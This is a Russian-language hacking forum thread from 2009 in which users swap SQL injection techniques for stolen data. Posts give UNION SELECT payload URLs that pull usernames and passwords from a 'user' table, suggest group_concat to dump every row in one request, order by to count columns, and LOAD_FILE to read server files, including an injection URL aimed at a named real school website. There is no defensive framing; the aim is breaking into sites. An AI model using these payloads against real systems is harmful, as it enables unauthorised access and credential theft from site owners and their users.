 |
|
06.02.2009, 22:33
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
|
|
такой вопрос,
есть скуля http://www.site.com/index.php?id=-1+union+select+concat(user,password)+from+user+lim it+0,1--
выводит admin,pass
потом меняя limit выводим след записи..
можно ли как нибудь (не используя софта) сразу вывести все записи в браузер одним запросом
п.с http://www.site.com/index.php?id=-1+union+select+concat(user,password)+from+user--
выводит только первую
п.п.с записей много
|
|
|
06.02.2009, 22:36
|
|
Участник форума
Регистрация: 17.09.2008
Сообщений: 211
С нами:
9288132
Репутация:
571
|
|
Если выводит по одной записи - нет.
Можно, конечно, использовать group_concat(), но будет вывод только 1024 символов (по умолчанию)
|
|
|
|
06.02.2009, 22:37
|
|
Познающий
Регистрация: 02.01.2009
Сообщений: 55
С нами:
9133681
Репутация:
90
|
|
z00MAN можешь попробывать group_concat(user,password)
|
|
|
|
06.02.2009, 23:07
|
|
Новичок
Регистрация: 06.02.2009
Сообщений: 2
С нами:
9083950
Репутация:
0
|
|
Сообщение от ElteRUS
Должно быть таблица clubs находится в другой бд.
Меня по этому поводу тоже мысль посетила, но в SQL запрос вывелся весь на экран и в нем нет явного задания БД для первой таблицы CLUBS
select count(a.CL_ID) as total from CLUBS a where a.CL_DAY_EXPIRES >= now() and lower(a.CL_NAME) like 'bebebe' union select 1 from clubs/*%' group by a.CL_ID
Если бы даже перед этим запросом выполнялся USE имя_бд то его действие распространялось и на вторую часть запроса.
А доступ нужно получить не к форму а комментариям о фитнес-клубах. Т.е к основным таблицам сайта. А при "отсутствии" даже самой CLUBS подбирать название таблицы с комментами дело бесперспективное.
|
|
|
|
06.02.2009, 23:18
|
|
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами:
9780227
Репутация:
1423
|
|
new_daemon, там 4 ветка, information_schema отсутствует, так что только угадыванием )
|
|
|
|
06.02.2009, 23:53
|
|
Новичок
Регистрация: 04.12.2007
Сообщений: 6
С нами:
9702655
Репутация:
1
|
|
Всем доброго времени суток. Хотелось бы знать одну вещь:
является ли www.site.ru/?n=1" уязвимым, если выдается ошибка
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '2009-02-06 22:49:35", "***.***.***.***", 1) ON DUPLICATE KEY UPDATE page="/?n=1"", ' at line 1
и если да, то как подобрать кол-во таблиц. По этой ссылке http://forum.antichat.ru/thread43966.html говорится, что должна быть ошибка
«The used SELECT statements have a different number of columns»,
но у меня выходит почти та же ошибка (за исключением server version for the right syntax to use near 'UNION%20SELECT%201,%202%20--","2009-02-06 ) ON DUPLI' at line 1)
Может кто нить обьяснит дилетанту, что сие означает? ^_^
|
|
|
|
06.02.2009, 23:56
|
|
Banned
Регистрация: 11.10.2006
Сообщений: 682
С нами:
10306406
Репутация:
271
|
|
Zergius ты прав, это типичная sql иньекция.
Советую при подборе полей использовать order by.
На античате всё есть, юзай поиск.
Удачи 
p.s.ну а если есть вопросы то задавай. |
|
|
|
07.02.2009, 15:47
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами:
9227224
Репутация:
60
|
|
Здравствуйте
Такой вопрос:
каким образом можно узнать полный путь к тому или иному файлу
Искал в гугле нашел вот
Прошу помощи!
http://www.isj.ph.edu.ro/index.php?id=-6+union+select+1,Server.MapPath(%22%22),3,4,5 |
|
|
|
07.02.2009, 15:54
|
|
Участник форума
Регистрация: 29.10.2008
Сообщений: 165
С нами:
9227224
Репутация:
60
|
|
http://www.isj.ph.edu.ro/index.php?id=-6+union+select+1,2,LOAD_FILE('var/www/index.php'),4,5
пытаюсь вот таким образом,через ошибку
тут magic_quotes on
**************
Путь к файлу вообще как - нибудь можно узнать?через какую-либо функцию?Или запрос
|
|
|
|
07.02.2009, 15:55
|
|
Постоянный
Регистрация: 20.11.2008
Сообщений: 406
С нами:
9196401
Репутация:
930
|
|
Последний раз редактировалось z00MAN; 07.02.2009 в 16:00..
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Похожие темы
Линейный вид
